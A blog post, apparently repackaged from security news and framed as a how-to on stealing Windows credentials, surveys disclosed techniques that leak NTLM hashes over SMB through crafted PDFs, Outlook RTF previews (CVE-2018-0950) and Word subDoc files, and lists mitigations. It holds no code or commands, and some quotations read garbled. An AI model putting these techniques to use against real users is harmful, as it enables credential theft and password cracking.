How to steal Windows login credentials abusing the Server Message Block (SMB) protocol by Blackhat pakistan 2023
Hackers, cybercriminals and cyberspies are constantly devising new techniques to improve their attacks and How to steal Windows login, in some cases these methods are first discovered when threat actors use them in the wild.
Malicious emails are privileged vectors for hacking campaigns and
weaponized documents are the main ingredient for almost any spam and spear-phishing attack.
Weapons docs are usually created to exploit specific vulnerabilities in applications running on victims’ computers, but in some cases they can take advantage of native software features to launch a chain of attacks.
In this post, we will explore the main techniques to steal Windows credentials by exploiting the Server Message Block (SMB) protocol.
Armed PDF files
One of the first cases I want to analyze was first reported by Assaf Baharav, a security expert at Check Point.
Baharav explained that threat actors can use weaponized PDF files to steal Windows credentials, specifically the associated NTLM hashes, without any user interaction.
The researcher explained that attackers need to trick victims into opening a specially crafted file.
Rather than exploiting the vulnerability in Microsoft Word or RTF files, threat actors could use features natively contained in the PDF standard to steal NTLM hashes.
“An attacker can then use this to inject malicious content into the PDF so that when the PDF is opened, the target will automatically leak credentials in the form of an NTLM hash,” Baharav wrote.
The structure of a PDF file consists of several objects, such as booleans, integers and reals, strings, names, fields, streams, the null object, and dictionaries.
A dictionary object is a table containing pairs of objects, called entries (key and value). The researcher used a specially created PDF document for his proof-of-concept by inserting specific content into the above records.
“By inserting a malicious record (using the fields described above along with his SMB server details using the ‘/F’ key), an attacker can lure any target to open a crafted PDF file, which will then automatically leak their NTLM hash, prompt, user.” , hostname and domain details,” the expert added.
When a victim opens a PDF document, it automatically contacts a remote SMB server controlled by the attacker, but remember that SMB requests include an NTLM hash for the authentication process.
How to steal Windows login
“NTLM details are leaked through SMB traffic and sent to the attacker’s server, which can then be used to launch various SMB relay attacks,” the expert continues.
Using this trick, an attacker can obtain the NTLM hash, then use one of the tools available online to crack it and get the original password.
That kind of attack is stealth; it is impossible for the victims to notice any abnormal behavior.
Figure 1 – SMB operation
Similar techniques using SMB requests have been used by several threat actors in the past, but with other document types or operating system features (ie Office documents, shared folder authentication, Outlook)
According to Check Point, almost every PDF viewer on Windows is affected by this security flaw and will expose NTLM credentials.
Baharav successfully tested the attack on Adobe Acrobat and FoxIT Reader.
The experts followed the 90-day disclosure policy and highlighted the vulnerability of both Adobe and Foxit.
Adobe responded that they will not fix the issue as they consider it to be an operating system related bug, meanwhile FoxIT still hasn’t responded.
Adobe experts refer to Microsoft Security Advisory ADV170014, released in October 2017, which implements a mechanism and provides guidance on how users can disable NTLM SSO authentication on Windows operating systems.
Below the response from Adobe:
“Thank you for reviewing this case. Microsoft released an optional security enhancement [0] late last year that gives customers the ability to disable NTLM SSO authentication as a method for public resources. With this mitigation available to customers, we do not plan to make changes to Acrobat. “
Windows Credential Theft Exploiting Microsoft Outlook Flaw
Nearly 19 months ago, security researcher Will Dormann of the CERT Coordination Center (CERT/CC) discovered a critical vulnerability in Microsoft Outlook identified as CVE-2018-0950.
Two years later, Microsoft only partially fixed the bug with April Patch Tuesday updates. The bug in Microsoft Outlook is related to the way Microsoft Outlook renders remotely hosted OLE content when previewing Rich Text Format (RTF) email and automatically initiates an SMB connection.
CVE-2018-0950 could be exploited by attackers to steal sensitive data, such as Windows credentials, by forcing victims to preview an email using Microsoft Outlook.
“Outlook blocks remote web content due to privacy risk of web bugs. But for rich text email, the OLE object is loaded without user interaction. Let’s look at the traffic in Wireshark to see what exactly is being leaked as a result of this automatic remote object fetching,” wrote Dormann.
Also read:Everything you need to know about Ethical Hacking as a Career by Blackhat Pakistan 2023
The vulnerability, discovered by Will Dormann of the CERT Coordination Center (CERT/CC), is in the way Microsoft Outlook renders remotely hosted OLE content when previewing a Rich Text Format (RTF) email message and automatically initializes an SMB connection.
The attack scenario shows that a remote attacker exploits the vulnerability by sending an RTF email to the victim; the malicious message contains an image file (OLE object) that is retrieved from a remote SMB server under the control of the attackers.
“Here we see that an SMB connection is auto-negotiated. The only action that triggers this negotiation is for Outlook to preview the email sent to it.”
The following screenshot shows that IP address, domain name, username, hostname, SMB session key are leaking.
“Microsoft Outlook automatically loads remote OLE content when previewing an RTF email. When remote OLE content is hosted on an SMB/CIFS server, the Windows client system attempts to authenticate with the server using single sign-on (SSO),” according to CERT. “A user’s IP address, domain name, username, hostname, and password hash may be leaked. If the user’s password is not complex enough, an attacker can crack the password in a short time.”
Microsoft Outlook automatically renders OLE content; that is, it initiates automatic authentication with a remote server controlled by the attacker over the SMB protocol using single sign-on (SSO). This will leak the NTLMv2 hashed version of the password, which could be cracked by attacks by commercial tools and services.
Microsoft tried to fix the bug in recent security updates, but only successfully fixed SMB connections automatically when viewing RTF emails, any other SMB attack is still feasible.
“It’s important to note that even with this patch, a user is still one click away from falling victim to the types of attacks described above,” Dormann added. “For example, if an email message has a UNC-style link that begins with “”, clicking the link will initiate an SMB connection to the specified server.
Figure 3 – Partial fix
In short, installing Microsoft’s update for CVE-2018-0950 will not fully protect users from exploiting this issue.
Users are advised to use the following mitigations:
Install the Microsoft update for CVE-2018-0950.
Block ports 445/tcp, 137/tcp, 139/tcp along with 137/udp and 139/udp used for SMB sessions.
Block NT LAN Manager (NTLM) Single Sign-on (SSO) authentication.
Always strong passwords.
Never click on suspicious links embedded in emails.
Using Microsoft documents to steal Windows credentials
In January 2018, researchers at security firm Rhino Labs discovered that attackers could exploit a Microsoft Word feature called subDoc to retrieve NTLM hashes from Windows systems.
The attackers use a Word file that retrieves a subdocument from an SMB server controlled by the attacker.
Instead of delivering the requested subdocument, the SMB server tricks the victim’s computer into passing an NTLM hash that is used to authenticate to the fake domain.
This type of attack is very difficult to detect, as experts explain; almost no anti-virus software detected the weaponized documents used in this scheme at the time of their discovery.
“Since this feature has not been publicly recognized as an attack vector for malicious actions, it is not something that antivirus software would recognize,” Rhino Labs experts said.
Rhino Labs has also released a tool called SubDoc Injector to generate subDoc weaponized Word files, allowing administrators to test the security of their infrastructure against these attacks.
The SubDoc Injector tool was developed by well-known ex-LulzSec member Hector “Sabu” Monsegur.
Sources
- NTLM credentials theft via pdf files
- Windows login credentials hack
- Microsoft outlook
- Weaponized PDF hack windows
- SSO Exploitation guide
- Automatically stealing password hashes with Microsoft outlook
- Abusing Microsoft Word features phishing
